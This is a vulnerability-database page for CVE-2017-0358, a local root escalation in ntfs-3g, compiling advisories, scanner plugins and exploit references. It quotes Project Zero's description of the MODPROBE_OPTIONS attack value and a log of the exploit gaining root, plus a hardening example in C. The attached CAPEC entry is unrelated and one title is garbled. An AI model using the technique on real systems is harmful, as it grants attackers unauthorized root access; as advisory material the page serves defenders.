CVE-2017-0358 - Improper Privilege Management vulnerability in multiple products
Attack vector | LOCAL |
Attack complexity | LOW |
Privileges required | LOW |
Confidentiality impact | HIGH |
Integrity impact | HIGH |
Availability impact | HIGH |
Summary
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Restful Privilege Elevation: REST uses standard HTTP-style (GET, PUT, DELETE) permission methods, but these are not necessarily correlated with the back-end programs. A strict interpretation of HTTP GET means that GET services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation follows these guidelines, an HTTP request can easily execute a delete or update on the server side. The attacker identifies an HTTP GET URL such as http://victimsite/updateOrder, which calls out to a program to update orders in a database or other resource. The URL is not idempotent, so the request can be submitted multiple times by the attacker; additionally, the attacker may be able to exploit a URL published as a GET method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
Exploit-Db
file | exploits/linux/local/41356.txt |
id | EDB-ID:41356 |
last seen | 2018-11-30 |
modified | 2017-02-14 |
platform | linux |
port | |
published | 2017-02-14 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/41356 |
title | ntfs-3g - Unsanitized modprobe Environment Privilege Escalation |
type | local |

description | ntfs-3g (Debian 9) - Privilege Escalation. CVE-2017-0358. Local exploit for Linux platform |
file | exploits/linux/local/41240.sh |
id | EDB-ID:41240 |
last seen | 2017-02-04 |
modified | 2017-02-03 |
platform | linux |
port | |
published | 2017-02-03 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/41240/ |
title | ntfs-3g (Debian 9) - Privilege Escalation |
type | local |
Metasploit
description | ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe. This can be abused to load a kernel module and execute a binary payload as the root user. |
id | MSF:EXPLOIT/LINUX/LOCAL/NTFS3G_PRIV_ESC |
last seen | 2020-06-08 |
modified | 2018-10-10 |
published | 2017-02-26 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/ntfs3g_priv_esc.rb |
title | Debian/Ubuntu ntfs-3g Local Privilege Escalation |
Nessus
NASL family | SuSE Local Security Checks |
NASL id | SUSE_SU-2018-3587-1.NASL |
description | This update for ntfs-3g_ntfsprogs fixes the following issues : CVE-2017-0358: Missing sanitization of the environment during a call to modprobe allowed local users to escalate to root privilege (bsc#1022500) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 118587 |
published | 2018-11-01 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/118587 |
title | SUSE SLED12 Security Update : ntfs-3g_ntfsprogs (SUSE-SU-2018:3587-1) |

NASL family | Debian Local Security Checks |
NASL id | DEBIAN_DLA-815.NASL |
description | Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation. For Debian 7 |
last seen | 2020-03-17 |
modified | 2017-02-03 |
plugin id | 96963 |
published | 2017-02-03 |
reporter | This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/96963 |
title | Debian DLA-815-1 : ntfs-3g security update |

NASL family | SuSE Local Security Checks |
NASL id | OPENSUSE-2018-1376.NASL |
description | This update for ntfs-3g_ntfsprogs fixes the following issues : - CVE-2017-0358: Missing sanitization of the environment during a call to modprobe allowed local users to escalate to root privilege (bsc#1022500) This update was imported from the SUSE:SLE-12:Update update project. |
last seen | 2020-06-05 |
modified | 2018-11-10 |
plugin id | 118874 |
published | 2018-11-10 |
reporter | This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/118874 |
title | openSUSE Security Update : ntfs-3g_ntfsprogs (openSUSE-2018-1376) |

NASL family | Ubuntu Local Security Checks |
NASL id | UBUNTU_USN-3182-1.NASL |
description | Jann Horn discovered that NTFS-3G incorrectly filtered environment variables when using the modprobe utility. A local attacker could possibly use this issue to load arbitrary kernel modules. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 96951 |
published | 2017-02-02 |
reporter | Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/96951 |
title | Ubuntu 16.04 LTS / 16.10 : ntfs-3g vulnerability (USN-3182-1) |

NASL family | Gentoo Local Security Checks |
NASL id | GENTOO_GLSA-201702-10.NASL |
description | The remote host is affected by the vulnerability described in GLSA-201702-10 (NTFS-3G: Privilege escalation) The NTFS-3G driver does not properly clear environment variables before invoking mount or umount. This flaw is similar to the vulnerability described in “GLSA-201701-19” and “GLSA-201603-04” referenced below but is now implemented in the NTFS-3G driver itself. Impact : A local user could gain root privileges. Workaround : There is no known workaround at this time. However, on Gentoo when the “suid” USE flag is not set (which is the default) an attacker cannot exploit the flaw. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 97253 |
published | 2017-02-21 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/97253 |
title | GLSA-201702-10 : NTFS-3G: Privilege escalation |

NASL family | SuSE Local Security Checks |
NASL id | SUSE_SU-2018-3587-2.NASL |
description | This update for ntfs-3g_ntfsprogs fixes the following issues : CVE-2017-0358: Missing sanitization of the environment during a call to modprobe allowed local users to escalate to root privilege (bsc#1022500) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 119672 |
published | 2018-12-14 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/119672 |
title | SUSE SLED12 Security Update : ntfs-3g_ntfsprogs (SUSE-SU-2018:3587-2) |

NASL family | Debian Local Security Checks |
NASL id | DEBIAN_DSA-3780.NASL |
description | Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 96933 |
published | 2017-02-02 |
reporter | This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/96933 |
title | Debian DSA-3780-1 : ntfs-3g - security update |
Packetstorm
data source | https://packetstormsecurity.com/files/download/141882/ntfs3g_priv_esc.rb.txt |
id | PACKETSTORM:141882 |
last seen | 2017-04-10 |
published | 2017-04-04 |
reporter | h00die |
source | https://packetstormsecurity.com/files/141882/Debian-Ubuntu-ntfs-3g-Local-Privilege-Escalation.html |
title | Debian/Ubuntu ntfs-3g Local Privilege Escalation |
Seebug
bulletinFamily | exploit |
description | Source: [https://bugs.chromium.org/p/project-zero/issues/detail?id=1072](https://bugs.chromium.org/p/project-zero/issues/detail?id=1072)

ntfs-3g is installed by default e.g. on Ubuntu and comes with a setuid root program /bin/ntfs-3g. When this program is invoked on a system whose kernel does not support FUSE filesystems (detected by get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using /sbin/modprobe via load_fuse_module().

The issue is that /sbin/modprobe is not designed to run in a setuid context. As the manpage of modprobe explicitly points out: The MODPROBE_OPTIONS environment variable can also be used to pass arguments to modprobe.

Therefore, on a system that does not seem to support FUSE filesystems, an attacker can set the environment variable MODPROBE_OPTIONS to something like "-C /tmp/evil_config -d /tmp/evil_root" to force modprobe to load its configuration and the module from attacker-controlled directories. This allows a local attacker to load arbitrary code into the kernel.

In practice, the FUSE module is usually already loaded. However, the issue can still be attacked because a failure to open /proc/filesystems (meaning that get_fuse_fstype() returns FSTYPE_UNKNOWN) always causes modprobe to be executed, even if the FUSE module is already loaded. An attacker can cause an attempt to open /proc/filesystems to fail by exhausting the global limit on the number of open file descriptions (/proc/sys/fs/file-max).

I have attached an exploit for the issue. I have tested it in a VM with Ubuntu Server 16.10. To reproduce, unpack the attached file, compile the exploit and run it:

```bash
user@ubuntu:~$ tar xf ntfs-3g-modprobe-unsafe.tar
user@ubuntu:~$ cd ntfs-3g-modprobe-unsafe/
user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.8.0-32-generic'
CC [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/user/ntfs-3g-modprobe-unsafe/rootmod.mod.o
LD [M] /home/user/ntfs-3g-modprobe-unsafe/rootmod.ko
make: Leaving directory '/usr/src/linux-headers-4.8.0-32-generic'
depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.order: No such file or directory
depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.builtin: No such file or directory
user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./sploit
looks like we won the race
got ENFILE at 198088 total
Failed to open /proc/filesystems: Too many open files in system
yay, modprobe ran!
modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.u48sGO/lib/modules/4.8.0-32-generic/modules.builtin.bin'
modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
Error opening '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
Failed to mount '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
we have root privs now...
root@ubuntu:~/ntfs-3g-modprobe-unsafe# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lxd),123(libvirt),127(sambashare),128(lpadmin),1000(user)
```

Note: The exploit seems to work relatively reliably in VMs with multiple CPU cores, but not in VMs with a single CPU core. If you test this exploit in a VM, please ensure that the VM has at least two CPU cores.

Proof of Concept: [https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41356.zip](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41356.zip) |
id | SSV:92684 |
last seen | 2017-11-19 |
modified | 2017-02-15 |
published | 2017-02-15 |
reporter | Root |
title | ntfs-3g - Unsanitized modprobe mention the right Vulnerability (CVE-2017-0358) |
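The defensive lesson of the report above is that a setuid program must not let the invoker's environment reach a helper such as modprobe. The C below is an added illustration, not ntfs-3g's own code: `run_with_env` execs a helper with exactly the environment it is handed, `spawn_modprobe_unsafe` shows the inherited-environment pattern the report describes, and `spawn_modprobe_hardened` replaces it with a fixed minimal environment. The `LD_` prefix check and the PATH value in `helper_env` are assumptions for the example.

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

extern char **environ;

/* Fixed, caller-independent environment for the helper (PATH value assumed). */
static char *const helper_env[] = { "PATH=/sbin:/usr/sbin:/bin:/usr/bin", NULL };

/* Returns 1 if envp carries nothing that modprobe (MODPROBE_OPTIONS, the
 * variable named in the report) or the dynamic loader (LD_*, assumed here
 * as a general setuid concern) would honour from an unprivileged caller. */
int env_is_safe_for_helper(char *const envp[])
{
    for (size_t i = 0; envp && envp[i]; i++) {
        if (strncmp(envp[i], "MODPROBE_OPTIONS=", 17) == 0) return 0;
        if (strncmp(envp[i], "LD_", 3) == 0) return 0;
    }
    return 1;
}

/* Fork and exec cmd with exactly the environment envp. Returns the child's
 * exit status, or -1 if fork/exec/wait failed. */
int run_with_env(const char *cmd, char *const argv[], char *const envp[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(cmd, argv, envp); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The pattern the report describes: the privileged helper inherits the
 * invoker's environ, so an exported MODPROBE_OPTIONS reaches modprobe. */
int spawn_modprobe_unsafe(const char *modprobe)
{
    char *const argv[] = { (char *)modprobe, "fuse", NULL };
    return run_with_env(modprobe, argv, environ);
}

/* Hardened: same command, but only the fixed environment is passed on. */
int spawn_modprobe_hardened(const char *modprobe)
{
    char *const argv[] = { (char *)modprobe, "fuse", NULL };
    return run_with_env(modprobe, argv, helper_env);
}
```

Checking `env_is_safe_for_helper(environ)` before the exec is a useful belt-and-braces assertion, but the hardened path does not depend on it: the helper simply never sees the caller's variables.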
References
- http://www.openwall.com/lists/oss-security/2017/02/04/1
- http://www.securityfocus.com/bid/95987
- https://marc.info/?l=oss-security&m=148594671929354&w=2
- https://security.gentoo.org/glsa/201702-10
- https://www.debian.org/security/2017/dsa-3780
- https://www.exploit-db.com/exploits/41240/
- https://www.exploit-db.com/exploits/41356/